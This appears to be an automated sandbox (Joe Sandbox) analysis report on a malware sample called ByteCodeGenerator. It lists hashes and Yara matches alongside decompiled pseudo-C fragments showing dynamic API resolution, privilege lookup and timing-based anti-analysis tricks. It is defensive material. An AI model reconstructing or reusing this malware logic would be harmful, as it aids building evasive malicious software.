                                  • Opcode Fuzzy Hash: 32815766699fc65d16551099cf8225c37082582fe1b9401d0c77260a7443dc66
                                  • Instruction Fuzzy Hash: 96900261652085566545F16944045474006ABE1281791C013A1405D50C87669856E665
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: eee66bf98d5e7f346a28c14f97dabf5d1f555fa493f51bfc3e9bf70bc80b8fdb
                                  • Instruction ID: 721692241b1575d16b876efe69372349f47c98cba18c4ad950efe9127ba264bc
                                  • Opcode Fuzzy Hash: eee66bf98d5e7f346a28c14f97dabf5d1f555fa493f51bfc3e9bf70bc80b8fdb
                                  • Instruction Fuzzy Hash: C090027161104817E111A169450474700099BD1281F91C413A0415958D97968952B165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f694cada6d72afd075dd730de55ae2b3700e7b682271523ac9d94a8ee5924ad1
                                  • Instruction ID: 03552dc61d1a17ddaaea29e1b8a69369493eb779f98392d70b364c854d60113c
                                  • Opcode Fuzzy Hash: f694cada6d72afd075dd730de55ae2b3700e7b682271523ac9d94a8ee5924ad1
                                  • Instruction Fuzzy Hash: 28900261A1104906E101B1694404656000A9BD1281F91C023A1015955ECB658992B175
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 0a122c963a61919018644b4999afc533fd462f75f3d9242780d4e52afc15d894
                                  • Instruction ID: 6c700813036fda15f0d2e4fafc4bb2343a6d095cdb285efbf5418c230b6f0fb0
                                  • Opcode Fuzzy Hash: 0a122c963a61919018644b4999afc533fd462f75f3d9242780d4e52afc15d894
                                  • Instruction Fuzzy Hash: 3890027161104806E100A5A9540868600059BE1341F51D012A5015955EC7A588917175
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d8eced7ba91e6e89b4324036836b9a5029556e63cebd3aeca0cc3d3fbb149bb4
                                  • Instruction ID: edf248748426d2ec0d7f5fc390d729b25af113572ab2956de6c7d4be0b7facf3
                                  • Opcode Fuzzy Hash: d8eced7ba91e6e89b4324036836b9a5029556e63cebd3aeca0cc3d3fbb149bb4
                                  • Instruction Fuzzy Hash: 7090027172118806E110A169840474600059BD2241F51C412A0815958D87D588917166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7d1d5d26a38ed3e4053779a80975f4bccf6e03ddec2d00a9a9e378b4f9cd8a1e
                                  • Instruction ID: c3542da5ff0274f083d4747691c791448eba2317ac09cbaf04da808fb45f567a
                                  • Opcode Fuzzy Hash: 7d1d5d26a38ed3e4053779a80975f4bccf6e03ddec2d00a9a9e378b4f9cd8a1e
                                  • Instruction Fuzzy Hash: B790026962304406E180B169540864A00059BD2242F91D416A0006958CCB5588696365
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8879e6db0b26ae597356e743cada963756c9005c61a4fb95cdf29e263bdde685
                                  • Instruction ID: ae5d4be04448c0682f8658fab2bf3b1db832bb550a24f6c577f8ce385d42cd41
                                  • Opcode Fuzzy Hash: 8879e6db0b26ae597356e743cada963756c9005c61a4fb95cdf29e263bdde685
                                  • Instruction Fuzzy Hash: C690026171104407E140B16954186464005EBE2341F51D012E0405954CDB5588566266
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4e2bdeaf160ba4e8a75bb8cbc01025680fc3cc67d5a339625c122431c3610cfe
                                  • Instruction ID: 3ddb0b5fe6e8357961c3619329b470e45316d582d90af8c213139464a8021c1e
                                  • Opcode Fuzzy Hash: 4e2bdeaf160ba4e8a75bb8cbc01025680fc3cc67d5a339625c122431c3610cfe
                                  • Instruction Fuzzy Hash: C590027161104C06E180B169440468A00059BD2341F91C016A0016A54DCB558A5977E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 422aa480db2f2d9ea9496271b43a378570feaf67a5ae0bb2f32bd8acabf3c5ea
                                  • Instruction ID: d560fb11157220cce11041b08f81ceb93b34b34cc2aa5b4341b25110b8f37bee
                                  • Opcode Fuzzy Hash: 422aa480db2f2d9ea9496271b43a378570feaf67a5ae0bb2f32bd8acabf3c5ea
                                  • Instruction Fuzzy Hash: 869002716110CC06E110A169840478A00059BD1341F55C412A4415A58D87D588917165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4ee2dacce31ce40bfe94d50b8a5700d935f59d03ff6d1d170201f951d9357499
                                  • Instruction ID: 5b28eb8de60928031096985bb38f5e10599815e238b8e87ab2d5f71583eea9f1
                                  • Opcode Fuzzy Hash: 4ee2dacce31ce40bfe94d50b8a5700d935f59d03ff6d1d170201f951d9357499
                                  • Instruction Fuzzy Hash: AD900265621044071105E569070454700469BD6391351C022F1006950CD76188616165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e14536db0a048d019b1c9dc0630e991a365a469e612ed9124fa767fa4ec3f196
                                  • Instruction ID: 5df116ea07b011e3a5d2285cb9e8974d0b5c85eff49e3716b1ca15a1878ac7e5
                                  • Opcode Fuzzy Hash: e14536db0a048d019b1c9dc0630e991a365a469e612ed9124fa767fa4ec3f196
                                  • Instruction Fuzzy Hash: D09002A1612044075105B1694414656400A9BE1241B51C022E1005990DC76588917169
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E00408EE0(intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				char _v24;
                                  				char _v284;
                                  				char _v804;
                                  				char _v840;
                                  				void* _t24;
                                  				void* _t31;
                                  				void* _t33;
                                  				void* _t34;
                                  				void* _t39;
                                  				void* _t50;
                                  				intOrPtr _t52;
                                  				void* _t53;
                                  				void* _t54;
                                  				void* _t55;
                                  				void* _t56;
                                  				void* _t57;
                                  
                                  				_t52 = _a4;
                                  				_t39 = 0; // executed
                                  				_t24 = E00407220(_t52,  &_v24); // executed
                                  				_t55 = _t54 + 8;
                                  				if(_t24 != 0) {
                                  					_push( &_v840);
                                  					asm("in al, dx");
                                  					E00407430( &_v24, _t53);
                                  					_t56 = _t55 + 8;
                                  					do {
                                  						E0041BF50( &_v284, 0x104);
                                  						E0041C5C0( &_v284,  &_v804);
                                  						_t57 = _t56 + 0x10;
                                  						_t50 = 0x4f;
                                  						while(1) {
                                  							_t31 = E00415A50(E004159F0(_t52, _t50),  &_v284);
                                  							_t57 = _t57 + 0x10;
                                  							if(_t31 != 0) {
                                  								break;
                                  							}
                                  							_t50 = _t50 + 1;
                                  							if(_t50 <= 0x62) {
                                  								continue;
                                  							} else {
                                  							}
                                  							goto L9;
                                  						}
                                  						_t9 = _t52 + 0x18; // 0x5e14c483
                                  						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
                                  						_t39 = 1;
                                  						L9:
                                  						_t33 = E00407460( &_v24,  &_v840);
                                  						_t56 = _t57 + 8;
                                  					} while (_t33 != 0 && _t39 == 0);
                                  					_t34 = E004074E0(_t52,  &_v24); // executed
                                  					if(_t39 == 0) {
                                  						asm("rdtsc");
                                  						asm("rdtsc");
                                  						_v8 = _t34 - 0 + _t34;
                                  						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
                                  					}
                                  					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
                                  					_t20 = _t52 + 0x35; // 0xffff43e8
                                  					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
                                  					return 1;
                                  				} else {
                                  					return _t24;
                                  				}
                                  			}




















                                  0x00408eeb
                                  0x00408ef3
                                  0x00408ef5
                                  0x00408efa
                                  0x00408eff
                                  0x00408f0d
                                  0x00408f10
                                  0x00408f12
                                  0x00408f17
                                  0x00408f20
                                  0x00408f2c
                                  0x00408f3f
                                  0x00408f44
                                  0x00408f47
                                  0x00408f50
                                  0x00408f62
                                  0x00408f67
                                  0x00408f6c
                                  0x00000000
                                  0x00000000
                                  0x00408f6e
                                  0x00408f72
                                  0x00000000
                                  0x00000000
                                  0x00408f74
                                  0x00000000
                                  0x00408f72
                                  0x00408f76
                                  0x00408f79
                                  0x00408f7f
                                  0x00408f81
                                  0x00408f8c
                                  0x00408f91
                                  0x00408f94
                                  0x00408fa1
                                  0x00408fac
                                  0x00408fae
                                  0x00408fb4
                                  0x00408fb8
                                  0x00408fbb
                                  0x00408fbb
                                  0x00408fc2
                                  0x00408fc5
                                  0x00408fca
                                  0x00408fd7
                                  0x00408f06
                                  0x00408f06
                                  0x00408f06

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 45a9ffffc1bb66904736693551cb8cec68a4d9d239754d67def20e9a94783bdb
                                  • Instruction ID: 04565e57300d49175d15a998b0a58af1518d6789ff1dbd126887ffe96cc14b24
                                  • Opcode Fuzzy Hash: 45a9ffffc1bb66904736693551cb8cec68a4d9d239754d67def20e9a94783bdb
                                  • Instruction Fuzzy Hash: A4210CB2D4410957CB20D6709D41EFB73AC9B54308F44057FF989A3181FA39BB4987A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 195 407688-4076da call 41bfa0 call 41cb80 call 40a150 call 415ab0 204 4076dc-4076ee PostThreadMessageW 195->204 205 40770e-407712 195->205 206 4076f0-40770a call 4098b0 204->206 207 40770d 204->207 206->207 207->205
                                  C-Code - Quality: 66%
                                  			E00407688(intOrPtr _a4, long _a8) {
                                  				char _v67;
                                  				char _v68;
                                  				void* _t12;
                                  				int _t13;
                                  				long _t21;
                                  				int _t26;
                                  				void* _t29;
                                  				void* _t31;
                                  				void* _t36;
                                  
                                  				asm("aad 0x11");
                                  				asm("fist word [ebp-0x75]");
                                  				_t29 = _t31;
                                  				_v68 = 0;
                                  				E0041BFA0( &_v67, 0, 0x3f);
                                  				E0041CB80( &_v68, 3);
                                  				_t12 = E0040A150(_t36, _a4 + 0x20,  &_v68); // executed
                                  				_t13 = E00415AB0(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
                                  				_t26 = _t13;
                                  				if(_t26 != 0) {
                                  					_t21 = _a8;
                                  					_t13 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                  					_t38 = _t13;
                                  					if(_t13 == 0) {
                                  						_t13 =  *_t26(_t21, 0x8003, _t29 + (E004098B0(_t38, 1, 8) & 0x000000ff) - 0x40, _t13);
                                  					}
                                  				}
                                  				return _t13;
                                  			}












                                  0x0040768d
                                  0x0040768f
                                  0x00407691
                                  0x0040769f
                                  0x004076a3
                                  0x004076ae
                                  0x004076be
                                  0x004076ce
                                  0x004076d3
                                  0x004076da
                                  0x004076dd
                                  0x004076ea
                                  0x004076ec
                                  0x004076ee
                                  0x0040770b
                                  0x0040770b
                                  0x0040770d
                                  0x00407712

                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076EA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: a640b2e82ce3cdb2ece1dc0e2075c5c543b759b192c33dd39928b3b106438736
                                  • Instruction ID: 4b61a7d211d2fb3ccea29c8a814ea5edaf5652a93d133452550d52a6c623eca6
                                  • Opcode Fuzzy Hash: a640b2e82ce3cdb2ece1dc0e2075c5c543b759b192c33dd39928b3b106438736
                                  • Instruction Fuzzy Hash: 9D01DD31E80214B6EB21A6A19C43FFE772CAF04B54F14011EFB04BA2C1D7A8790547EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 210 407690-40769f 211 4076a8-4076da call 41cb80 call 40a150 call 415ab0 210->211 212 4076a3 call 41bfa0 210->212 219 4076dc-4076ee PostThreadMessageW 211->219 220 40770e-407712 211->220 212->211 221 4076f0-40770a call 4098b0 219->221 222 40770d 219->222 221->222 222->220
                                  C-Code - Quality: 82%
                                  			E00407690(void* __eflags, intOrPtr _a4, long _a8) {
                                  				char _v67;
                                  				char _v68;
                                  				void* _t12;
                                  				intOrPtr* _t13;
                                  				int _t14;
                                  				long _t21;
                                  				intOrPtr* _t25;
                                  				void* _t26;
                                  				void* _t30;
                                  
                                  				_t30 = __eflags;
                                  				_v68 = 0;
                                  				E0041BFA0( &_v67, 0, 0x3f);
                                  				E0041CB80( &_v68, 3);
                                  				_t12 = E0040A150(_t30, _a4 + 0x20,  &_v68); // executed
                                  				_t13 = E00415AB0(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
                                  				_t25 = _t13;
                                  				if(_t25 != 0) {
                                  					_t21 = _a8;
                                  					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                  					_t32 = _t14;
                                  					if(_t14 == 0) {
                                  						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004098B0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                  					}
                                  					return _t14;
                                  				}
                                  				return _t13;
                                  			}












                                  0x00407690
                                  0x0040769f
                                  0x004076a3
                                  0x004076ae
                                  0x004076be
                                  0x004076ce
                                  0x004076d3
                                  0x004076da
                                  0x004076dd
                                  0x004076ea
                                  0x004076ec
                                  0x004076ee
                                  0x0040770b
                                  0x0040770b
                                  0x00000000
                                  0x0040770d
                                  0x00407712

                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076EA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: bcc2766419ff8699ccffec10ca63637502b574d4e43ea148258c0520cff985a9
                                  • Instruction ID: 83d30e25e5ad0d1c29ae5679c44f210f92c6e62b95bcc8237ab64f9ff0eb2b85
                                  • Opcode Fuzzy Hash: bcc2766419ff8699ccffec10ca63637502b574d4e43ea148258c0520cff985a9
                                  • Instruction Fuzzy Hash: CC01AC31A8021876E721A6E59C43FFF775C5B44B54F044119FF04BA2C1D6A8790647EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 261 41a632-41a656 263 41a65c-41a671 RtlFreeHeap 261->263 264 41a657 call 41af80 261->264 264->263
                                  C-Code - Quality: 40%
                                  			E0041A632(void* __ebx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                  				char _t11;
                                  
                                  				asm("adc cl, ah");
                                  				0xc9fda534();
                                  				_t8 = _a4;
                                  				_t3 = _t8 + 0xc90; // 0xc90
                                  				E0041AF80( *((intOrPtr*)(_a4 + 0x14)), _t8, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                  				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                  				return _t11;
                                  			}




                                  0x0041a632
                                  0x0041a637
                                  0x0041a643
                                  0x0041a64f
                                  0x0041a657
                                  0x0041a66d
                                  0x0041a671

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409123,?,?,00409123,00000060,00000000,00000000,?,?,00409123,?,00000000), ref: 0041A66D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: d0c936823ff5c2ad252b869b060f0834cbf9999bb5718d60a8160610cebe1ae3
                                  • Instruction ID: 126f6f065a6c8e195948a608302a0e1f00ab20717535dec10d70f07a86306964
                                  • Opcode Fuzzy Hash: d0c936823ff5c2ad252b869b060f0834cbf9999bb5718d60a8160610cebe1ae3
                                  • Instruction Fuzzy Hash: C1E06DB62012146BCB14EF59DC48EDB3768AF88760F114604FD295B392C530E911CBF1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 265 41a791-41a7ba call 41af80 267 41a7bf-41a7d4 LookupPrivilegeValueW 265->267
                                  C-Code - Quality: 75%
                                  			E0041A791(void* __eax, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                  				int _t13;
                                  
                                  				asm("bound ecx, [eax+0x27c4e415]");
                                  				_t10 = _a4;
                                  				E0041AF80( *((intOrPtr*)(_a4 + 0xa1c)), _t10, _t10 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
                                  				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                  				return _t13;
                                  			}




                                  0x0041a791
                                  0x0041a7a3
                                  0x0041a7ba
                                  0x0041a7d0
                                  0x0041a7d4

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5D2,0040D5D2,00000041,00000000,?,00409195), ref: 0041A7D0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: d69a646c5c36267bbb633875f86e528798544fe35dae726bbb0cf543f0ac5da4
                                  • Instruction ID: 02c452ff56398534867a4f17c89e9a5c126501e1113552d4fa5d636c25862777
                                  • Opcode Fuzzy Hash: d69a646c5c36267bbb633875f86e528798544fe35dae726bbb0cf543f0ac5da4
                                  • Instruction Fuzzy Hash: 1BE0EDB2200204BFCB20CFA5DC95FE73B68AF45310F058068FA48AB252C630A810CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 271 41a640-41a671 call 41af80 RtlFreeHeap
                                  C-Code - Quality: 100%
                                  			E0041A640(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                  				char _t10;
                                  
                                  				_t3 = _a4 + 0xc90; // 0xc90
                                  				E0041AF80( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                  				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                  				return _t10;
                                  			}




                                  0x0041a64f
                                  0x0041a657
                                  0x0041a66d
                                  0x0041a671

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409123,?,?,00409123,00000060,00000000,00000000,?,?,00409123,?,00000000), ref: 0041A66D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                  • Instruction ID: 45d55810919158a659111e67d0a407e741ade5d90832e9fe2965276b0c930ded
                                  • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                  • Instruction Fuzzy Hash: AAE012B1200208ABDB14EF89DC49EA737ACAF88764F118159FA085B242C630E9208AF1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 268 41a600-41a616 269 41a61c-41a631 RtlAllocateHeap 268->269 270 41a617 call 41af80 268->270 270->269
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00415196,?,0041590F,0041590F,?,00415196,?,?,?,?,?,00000000,00409123,?), ref: 0041A62D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                  • Instruction ID: 662d25edec6ec49cd9688255824bcd6f72bf1aa4d061c92bd3eb1044ec084de6
                                  • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                  • Instruction Fuzzy Hash: BBE01AB12012046BDB14DF49DC45E9737ACAF88654F018155FA085B241C530F9108AF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041A7A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                  				int _t10;
                                  
                                  				E0041AF80( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
                                  				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                  				return _t10;
                                  			}




                                  0x0041a7ba
                                  0x0041a7d0
                                  0x0041a7d4

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5D2,0040D5D2,00000041,00000000,?,00409195), ref: 0041A7D0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                  • Instruction ID: d758170448368d960d754f0190a8431d72d351bcb9fa050036b78e11d814ca5a
                                  • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                  • Instruction Fuzzy Hash: 95E01AB12402086BDB10DF49CC45EE737ADAF89664F018155FA0857241C530E8158AF6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00415196,?,0041590F,0041590F,?,00415196,?,?,?,?,?,00000000,00409123,?), ref: 0041A62D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 901698763719260864b01bb65ee8322938829ac296a19666a6abe41ce8bed782
                                  • Instruction ID: a9d8ec8ec6d9b30e3dfefbad1e97290976ca8f8cf779f4b68e14c778b23e5077
                                  • Opcode Fuzzy Hash: 901698763719260864b01bb65ee8322938829ac296a19666a6abe41ce8bed782
                                  • Instruction Fuzzy Hash: 51E086B910A2845BC700EE6599408E67754AF84218318454AF85D43707D125E47586A7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041A680(intOrPtr _a4, int _a8) {
                                  
                                  				_t5 = _a4;
                                  				E0041AF80( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xc98,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
                                  				ExitProcess(_a8);
                                  			}



                                  0x0041a683
                                  0x0041a69a
                                  0x0041a6a8

                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                  • Instruction ID: db7006d07a1401f61abfba9401add25552f445c793cd13d3de3345adbd042a0c
                                  • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                  • Instruction Fuzzy Hash: 9CD017726412187BD620EB99CC89FD777ACDF457A4F0180A5BA0C6B242C934BA5187E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0041A67C(intOrPtr _a4, int _a8) {
                                  
                                  				_t5 = _a4;
                                  				_push(0x5515068e);
